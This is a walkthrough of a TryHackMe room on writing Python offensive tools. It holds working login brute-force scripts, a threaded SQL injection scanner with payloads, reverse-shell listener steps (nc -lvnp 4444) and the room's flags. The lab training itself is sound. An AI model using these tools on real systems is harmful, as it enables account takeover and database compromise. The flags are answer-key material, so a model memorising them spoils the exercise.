[THM] Custom Tooling Using Python
This is a full walkthrough with answers and explanations for the TryHackMe room "Custom Tooling Using Python".
Link to the room: https://tryhackme.com/room/customtoolingpython.
Remember to start the VM and the Attack Box. Before working on the tasks, map the lab hostname to the VM's IP by running the following in the terminal (writing to /etc/hosts needs root, which the Attack Box shell has):
echo "VM_IP python.thm" >> /etc/hosts
[Task 2] Using a Coding Language for Custom Tooling
Does a scripting language perform better than a compiled language? (Yea/Nay)
Nay
Scripting languages are generally slower because the code is interpreted at runtime rather than compiled ahead of time.
Which compiled language is easy to cross-compile?
Go
An advantage of Go is fast execution and easy cross-compilation.
Which scripting language is best suited for web-based exploits?
JavaScript
JavaScript is useful for web-based exploits and is natively supported by every browser and most web applications.
[Task 3] Developing a Brute-Forcing Tool
What is one of the renowned Python libraries used to send HTTP requests, interact with web applications, and analyse responses?
requests
What is the flag value after logging in as admin?
THM{Brute_Force_Success007}
Create and execute this script on your Attack Box:
import requests

url = "http://python.thm/labs/lab1/index.php"
username = "admin"

# Generating 4-digit numeric passwords (0000-9999)
password_list = [str(i).zfill(4) for i in range(10000)]

def brute_force():
    for password in password_list:
        data = {"username": username, "password": password}
        response = requests.post(url, data=data)
        # The login page answers "Invalid ..." on a failed login; anything else counts as a hit
        if "Invalid" not in response.text:
            print(f"[+] Found valid credentials: {username}:{password}")
            break
        else:
            print(f"[-] Attempted: {password}")

brute_force()
Can you attempt to log in as Mark, whose password follows a specific pattern? His password consists of the first three characters as digits (000-999) followed by a single uppercase letter (A-Z). What is the flag value?
THM{Brute_Force_Success_Mark001}
My script for this task:
import requests
import string

url = "http://python.thm/labs/lab1/index.php"
username = "Mark"

# Generating 3-digit numeric passwords followed by a single uppercase letter (000A-999Z)
password_list = [str(i).zfill(3) + l for i in range(1000) for l in string.ascii_uppercase]

def brute_force():
    for password in password_list:
        data = {"username": username, "password": password}
        response = requests.post(url, data=data)
        # Same success test as before: the page says "Invalid ..." on a failed login
        if "Invalid" not in response.text:
            print(f"[+] Found valid credentials: {username}:{password}")
            break
        else:
            print(f"[-] Attempted: {password}")

brute_force()
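The two scripts above differ only in how the candidate list is built. As an added example (my own code, not part of the room or of the scripts above), the generator below produces candidates from a pattern of character classes, so the 0000-9999 and 000A-999Z cases are one call each, and the brute-force loop checks the HTTP status before trusting the "Invalid" test: a 429 or 500 page that happens not to contain that word would otherwise be reported as valid credentials. The login form is replaced by a constructed in-memory stand-in with made-up passwords ("4721", "512K") and an optional rate limit; the URL is the lab's, everything else is an assumption. Pass requests.post in place of site.post to run it against the lab.

```python
import itertools
import string
from collections import namedtuple

URL = "http://python.thm/labs/lab1/index.php"

# One letter per position: d = digit, U = uppercase letter, l = lowercase letter
CHAR_CLASSES = {"d": string.digits, "U": string.ascii_uppercase, "l": string.ascii_lowercase}


def candidates(pattern):
    """Yield every password matching the pattern, in nested-loop order:
    'dddd' gives 0000, 0001, ..., 9999 and 'dddU' gives 000A, 000B, ..., 999Z."""
    pools = [CHAR_CLASSES[c] for c in pattern]
    for combo in itertools.product(*pools):
        yield "".join(combo)


FakeResponse = namedtuple("FakeResponse", "status_code text")


class FakeLogin:
    """Constructed stand-in for the lab's login form with made-up credentials.
    Optionally starts answering 429 after `throttle_after` requests, the way a
    rate-limited target would."""

    def __init__(self, valid, throttle_after=None):
        self.valid = valid
        self.throttle_after = throttle_after
        self.attempts = 0

    def post(self, url, data=None):
        self.attempts += 1
        if self.throttle_after is not None and self.attempts > self.throttle_after:
            return FakeResponse(429, "Too Many Requests")
        if self.valid.get(data["username"]) == data["password"]:
            return FakeResponse(200, "<h1>Welcome back!</h1>")
        return FakeResponse(200, "Invalid username or password")


def brute_force(username, pattern, post, url=URL, failure_marker="Invalid"):
    """Return the first password whose login response is a 200 without the
    failure marker, or None when the pattern is exhausted. `post` has the
    requests.post signature, so requests.post can be passed in directly.
    Any other status aborts the run: a 429 or 5xx body does not contain the
    word "Invalid" either, and treating it as a hit would be a false positive."""
    for password in candidates(pattern):
        response = post(url, data={"username": username, "password": password})
        if response.status_code != 200:
            raise RuntimeError(f"unexpected HTTP {response.status_code} at {password}; "
                               "back off instead of trusting the response body")
        if failure_marker not in response.text:
            return password
    return None


if __name__ == "__main__":
    site = FakeLogin({"admin": "4721", "Mark": "512K"})
    print("admin:", brute_force("admin", "dddd", site.post))
    print("Mark:", brute_force("Mark", "dddU", site.post))
```

Against the real lab, use a requests.Session rather than bare requests.post so the 10000 or 26000 attempts reuse one TCP connection, and expect the RuntimeError path to fire if the target starts throttling.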
[Task 4] Developing a Vulnerability Scanner
How many vulnerabilities will be identified if we use the above scanner.py script with the updated URL http://python.thm/labs/lab2/departments.php?name=? (without changing the original code)
0
Change only the URL in the scanner.py script and run it: the script still does not send its payloads as the value of the name parameter, so nothing is flagged.
After tweaking the above script to use the appropriate GET parameter, how many payloads are found? (with changing the original code)
2
Change line 18 of scanner.py to response = requests.get(url, params={"name": payload}) so that each payload is sent as the value of the name GET parameter (requests builds and URL-encodes the query string for you).
Which of the following is the valid type of vulnerability? Write the correct option only:
A) CSRF B) SQL injection C) Prototype Pollution D) XSS
B
Result of the script:
Potential SQL injection detected with payload...
What is the name of the renowned library that is used to make concurrent requests to an endpoint?
Threading
Running scans sequentially is slow, so we use multi-threading to send several requests at once, making the scanner faster. For this we can use the threading library from the standard library.
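The difference between 0 and 2 findings above comes down to whether the payload reaches the name parameter. The scanner below is an added example, not the room's scanner.py: it sends each payload with params={param: payload} exactly as in the line-18 fix, looks for database error strings in the response, and runs the payloads concurrently with a thread pool from concurrent.futures (which is built on the threading module). The target is a constructed stand-in for departments.php that leaks a MySQL syntax error when the injected input leaves the quotes in the query unbalanced; the payload list and error signatures are my own assumptions, and only the URL comes from the room. Replace site.get with requests.get to run it against the lab.

```python
import re
import threading
from collections import namedtuple
from concurrent.futures import ThreadPoolExecutor
from urllib.parse import parse_qs, urlsplit

URL = "http://python.thm/labs/lab2/departments.php"

# Payloads and error signatures are assumptions for this example, not the room's list
SQLI_PAYLOADS = ["'", "\"", "' OR 1=1", "' OR '1'='1", "1' AND 1=1-- -"]
SQL_ERROR_SIGNATURES = [
    re.compile(r"You have an error in your SQL syntax", re.I),  # MySQL / MariaDB
    re.compile(r"Warning: mysqli?_", re.I),                     # PHP mysql extensions
    re.compile(r"unterminated quoted string", re.I),            # PostgreSQL
    re.compile(r"SQLSTATE\[", re.I),                            # PDO
]

FakeResponse = namedtuple("FakeResponse", "status_code text")


class FakeDepartments:
    """Constructed stand-in for a vulnerable departments.php?name= endpoint.
    It models `... WHERE name='<input>'` built by string concatenation: when the
    quotes end up unbalanced (after a -- comment is stripped), the 'database'
    raises a syntax error that the page echoes back."""

    def get(self, url, params=None):
        query = parse_qs(urlsplit(url).query)
        if params:
            query.update({k: [v] for k, v in params.items()})
        name = query.get("name", [None])[0]
        if name is None:
            return FakeResponse(200, "<h1>Departments</h1><p>Select a department.</p>")
        statement = f"SELECT * FROM departments WHERE name='{name}'".split("--")[0]
        if statement.count("'") % 2:
            return FakeResponse(200, "You have an error in your SQL syntax; "
                                     "check the manual that corresponds to your MySQL server version")
        return FakeResponse(200, f"<h1>Departments</h1><p>No department named {name}</p>")


def looks_injectable(response):
    """True when the response body contains a known database error signature."""
    return any(sig.search(response.text) for sig in SQL_ERROR_SIGNATURES)


def scan(get, url, param, payloads=SQLI_PAYLOADS, workers=5):
    """Send every payload as the value of `param` and return, sorted, the ones
    that provoked a database error. `get` has the requests.get signature."""
    hits = []
    lock = threading.Lock()

    def probe(payload):
        # params= makes the client build and URL-encode the query string, so the
        # payload lands in the named parameter instead of being glued onto the URL
        response = get(url, params={param: payload})
        if looks_injectable(response):
            with lock:
                hits.append(payload)
            print(f"Potential SQL injection detected with payload: {payload}")

    with ThreadPoolExecutor(max_workers=workers) as pool:
        list(pool.map(probe, payloads))  # consuming the iterator re-raises worker exceptions
    return sorted(hits)


if __name__ == "__main__":
    site = FakeDepartments()
    print("name param:", scan(site.get, URL, "name"))
    print("wrong param:", scan(site.get, URL, "id"))
```

Sending the payloads under the wrong parameter name (the "id" call) returns nothing, which is the same effect as running the unmodified scanner against the new URL: the injection point is never exercised, so the scanner reports zero, not because the page is safe. Error-signature matching only catches error-based injection; a page that swallows database errors needs boolean or time-based probes instead.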
[Task 5] Creating a Basic Exploit
What is the flag value?
THM{basic_exploit_using_python}
1. nc -lvnp 4444
2. Modify the last script and change the IP to the Attack Box.
3. Find the file with the flag.
[Task 6]
What is the flag?
THM{6470e394cbf6dab6a91682cc8585059b}
Modify the last script to use your Attack Box IP, and remember to have a listener open before running it.